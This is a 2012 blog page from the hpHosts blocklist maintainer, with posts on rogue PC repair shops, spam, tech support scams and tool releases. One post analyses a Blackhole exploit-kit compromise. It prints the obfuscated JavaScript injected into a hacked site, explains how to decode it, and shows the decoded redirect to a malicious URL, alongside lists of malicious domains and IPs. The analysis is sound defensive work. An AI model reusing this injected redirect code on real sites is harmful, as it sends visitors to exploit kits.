Blog for hpHosts, and whatever else I feel like writing about ....

Thursday 18 October 2012

BBC Watchdog crew sink teeth into dodgy PC repair shops

The reputation of the UK's computer repair industry took another hammering last week following a BBC Watchdog investigation into two Worcestershire-based computer repair firms.

The flagship consumer affairs programme looked into Click 4 PC and Click Computers in response to reports from viewers about missing personal data, botched repairs and a computer being held to ransom. The subsequent investigation into Click 4 PC exposed dubious practices including false diagnosis of faults, alleged supply of illegal software and passing off used equipment as being new.


Read more
http://www.channelregister.co.uk/2012/10/18/pc_repairs_watchdog_probe/

References

Peeping Tom Mac spyware suspect cuffed
http://www.theregister.co.uk/2011/06/09/peeping_tom_mac_malware/

Micro Chip Computers: A lesson in losing customers
http://hphosts.blogspot.co.uk/2010/02/micro-chip-computers-lesson-in-losing.html

PC repair shop caught trying bank fraud
http://www.channelregister.co.uk/2009/07/22/dodgy_pc_repair_survey/

Monday 15 October 2012

Dear pkware.com, STOP SPAMMING!

Ever since InfoSec, I've been getting spam from PKware.com, despite several emails to them politely asking them not to, and despite clicking their unsubscription link, which is rather hillarious in itself, given I never subscribed in the first place (don't normally click unsubscription links if I've never subscribed in the first place, only did in this case, because I knew where they got the address - InfoSec (the InfoSec chaps forgot to mention, the companies scanning your ID card at InfoSec, would be getting your email address and other details, in order to spam you!)).

Though I doubt they read this, and despite having already blacklisted them (added them to hpHosts with the GRM classification), I'm hoping this will finally put a stop to it (well, I can dream ....).

Sunday 14 October 2012

Churchcastle Limited fined by regulator, Phonepayplus

UK premium-line regulator PhonepayPlus has slapped Churchcastle Limited with the largest fine it has dished to date, ruling the phone-quiz host guilty of misleading and bamboozling callers with impenetrable terms and conditions.

After it received 15 complaints, PhonepayPlus found Churchcastle guilty of targeting the elderly, keeping them hanging on the line at up to £1.53 a minute, inducing them to call back without explaining the costs properly, and then providing cheap prizes, all of which mounts up to a £800,000 fine and refunds to anyone who asks for one.

Churchcastle advertised its quiz line in various national papers, requiring players to complete a word search over the phone, but according to the regulator that call was just the hook with which marks were snagged.


Read more
http://www.theregister.co.uk/2012/10/12/phonepayplus_fine/

Friday 12 October 2012

Outlook Export v0.1.11

I needed a little break from work, so decided to sort out a few things in Outlook Export.

First and foremost, the About dialog has been updated.

Secondly, v0.1.11 now includes a work-around for Runtime error 462 "The remote server machine does not exist or is unavailable".

Third, when exporting, duplicates are now removed (were meant to have been anyway, but for some reason, it was ignoring it, now it shouldn't).

Finally, the system requirements have finally been updated. Nothing new required, it's just noting it works with Outlook 2007 (got quite a few emails asking me about it), and it's having been tested on both Vista and Windows 7.

Outlook Export
http://support.it-mate.co.uk/?mode=Products&p=outlookexport

Sunday 7 October 2012

ATTN: kcsoftwares.com

I recently had an e-mail from Kyle at kcsoftwares.com, regarding his sites listing in hpHosts.

Sadly, OVH are still blocking my emails, and as he used OVH for his mail server, my reply to his email got blocked as well (blocked emails to OVH show as a timeout when attempting to send the email to addresses using their mail server - rather annoying given other mail servers at least send a rejection notice).

No idea if he reads this (probably not), but he doesn't have a contact form on his site, so figured this was the best option.

If you are reading this Kyle, the reason for the sites listing, is the adware (sponsor software) included in your programs installers. The fact there's an optional package available without this, is irrelevant.

Friday 5 October 2012

hpHosts Updated: 05/10/2012

The hpHOSTS Hosts file has been updated. There is now a total of 184,831 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 05/10/2012 23:15
  2. Last Verified: 04/10/2012 12:00
Download hpHosts now!
http://hosts-file.net/?s=Download

Thursday 4 October 2012

FTC launches international crackdown on tech support scammers

The Federal Trade Commission has launched a major international crackdown on tech support scams in which telemarketers masquerade as major computer companies, con consumers into believing that their computers are riddled with viruses, spyware and other malware, and then charge hundreds of dollars to remotely access and “fix” the consumers’ computers.

At the request of the FTC, a U.S. District Court Judge has ordered a halt to six alleged tech support scams pending further hearings, and has frozen their assets.

“The FTC has been aggressive – and successful – in its pursuit of tech support scams,” said FTC Chairman Jon Leibowitz. “And the tech support scam artists we are talking about today have taken scareware to a whole other level of virtual mayhem.”


Read more
http://www.ftc.gov/opa/2012/10/pecon.shtm

References

Called by 03339009119?
http://hphosts.blogspot.co.uk/2012/07/called-by-03339009119.html

Info: Ammyy now warning about telephony scams
http://blog.eset.com/2012/08/24/ammyy-warning-against-tech-support-scams

OfCom: Unsolicited Telesales Calls
http://consumers.ofcom.org.uk/tell-us/telecoms/privacy/

Note: OfCom URL updated as they seem to have taken down the original page on this

Telephony scams: Your machine told them it was infected? Really?
http://mysteryfcm.co.uk/?mode=Articles&date=18-01-2012

Malwarebytes: Telephony Scams: Can You Help?
http://blog.malwarebytes.org/news/2012/05/telephony-scams-can-you-help/

Eset: The Tech Support Scammer’s Revenge
http://blog.eset.com/2012/07/23/the-tech-support-scammers-revenge

Tuesday 2 October 2012

Blackhole exploit: Compromised sites

Looking at a recent case of a compromised site, I noticed something rather surprising - they're not even bothering to try and make the code difficult to decode. I'm pondering of course, the thought that this is deliberate, due to the changes in v2.0 of the Blackhole exploit (others have already written about that [1] [2], so won't go into that here), but even if this is the case, the choice of using far less complex code on compromised sites, is puzzling to say the least.

In this case, the code inserted into the compromised site is (I've formatted it for readability)

v="v"+"a"+"l";
try
{
        faweb++
}
catch(btawetb)
{
        try
        {
                sbgesrb+325
        }
        catch(btawt4)
        {
                w=window;
                e=w["e"+v];
        }
}
if(1)
{
        f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
}
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
        j=i;
        if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
if(0x10==020)try
{
        gbrgbdf&236;
}
catch(asga)
{
e("if(1)"+s+"");}


To decode this, all you need to do, is modify it as follows;

v="v"+"a"+"l";
e=eval;
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
    j=i;
    s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
e(s);


Which gives us (I've disabled the URL, to prevent those that have links auto-hyperlinked);

var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}


In this case, onlinebayunator.ru is residing at;

70.38.31.71 - AS32613 70.38.0.0/17 IWEB-AS - iWeb Technologies Inc.
202.3.245.13 - AS9471 202.3.245.0/24 MANA-PF-AP MANA S.A.
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network

Other domains known to have (most are now thankfully, dead) or are, living on the IPs include;

adventiste.pf
anapoli.ru
ashanrestaurant.ru
atp.presidence.pf
bmwforummsk.ru
croixrouge.presidence.pf
denegnashete.ru
diareuomop.ru
dimabilanch.ru
etatsgeneraux.pf
flumifrator2unix.ru
forumanarhist.ru
furnitura-forums.ru
gorysevera.ru
ioponeslal.ru
ipadvssonyx.ru
kefrikin.ru
kerneloffce.ru
kolmykiaonline.ru
leprisoruim.ru
limonadiksec.ru
mazdaontours.ru
minweb.presidence.pf
mirdymas.ru
moskow-carsharing.ru
moskowpulkavo.ru
mskoblastionline.ru
myren.net.my
mysqlfordummys.ru
offshoremskk.ru
omahabeachs.ru
onerussiaboard.ru
onlinebayunator.ru
online-cammunity.ru
online-gaminatore.ru
panalki.ru
panamamoskow.ru
penelopochka.ru
phpforkiddies.ru
porschedesignrussia.ru
porscheforumspb.ru
presid.pf
presidence.gov.pf
presidence.pf
psg.presidence.pf
pussyriotss.ru
refonte.presidence.pf
rumyniaonline.ru
sectantes-x.ru
sergikgorec.ru
soisokdomen.ru
sonatanamore.ru
spb-koalitia.ru
switched-games.ru
uzoshkins.ru
zenedin-zidane.ru


hpHosts, Malware Domain List, Malwarebytes AntiMalware users will be pleased to know, the IPs/domains are already blocked.

Incidentally, onlinebayunator.ru was resolving to following yesterday (1st October), and nope, I'm not surprised to see CB3ROB' IP space making an appearance either;

84.22.100.108 - mail.cyberbunker.com - AS34109 84.22.96.0/19 AS34109 CB3ROB Ltd. & Co. KG
190.10.14.196 - cb9.creationsbank.com - AS3790 190.10.0.0/17 RADIOGRAFICA COSTARRICENSE
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network

References

Malware Domain List - Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=218.0

Malzilla (open source)
http://malzilla.sourceforge.net

Next hpHosts release, VB2012

As some of you know, I've been in the US for VB2012 and to visit the chaps and chapesses at the Malwarebytes HQ since September 24th, got back around mid-day on the 30th.

First and foremost, I'd like to say thank you to those involved in VB2012, as it was fantastic. Indeed, the only things I didn't like, were the bleedin heat (felt like I was melting), and the lack of both wifi and plug sockets on the planes (had never been out of the UK before, and was terrified of flying (still am - it's not normal!!)).

I also got to meet a living legend in Dallas - Alex Eckelberry, and Marcelo Rivero, amongst a plethora of others (I'm rubbish with names, so embarrasingly, can't remember the names of half of them).

The presentation I went to Dallas to do with David Harley (Eset), Martijn Grooten (Virus Bulletin) and Craig Johnston (Independent researcher, formerly Sophos), went well, despite the nerves getting the better of me (was not only my first flight, but my first presentation too).

On the subject of the presentation, one of the things we focused on, despite what the telephony scam was all about (for those that didn't already know), but also what could be done about it, and this included asking for more involvement, not only from the banks/financial institutions, law enforcement etc, but also from you - the security community, and most importantly, the public. If you'd like to get involved, please contact either myself, David, Craig or Martijn. The more help we can get, the better.

Due to being away, the hpHosts release was delayed, it is now due to be published on October 5th. As always, the partial update is available for those that would like to use it. The easiest method of doing this, is via programs such as HostsMan.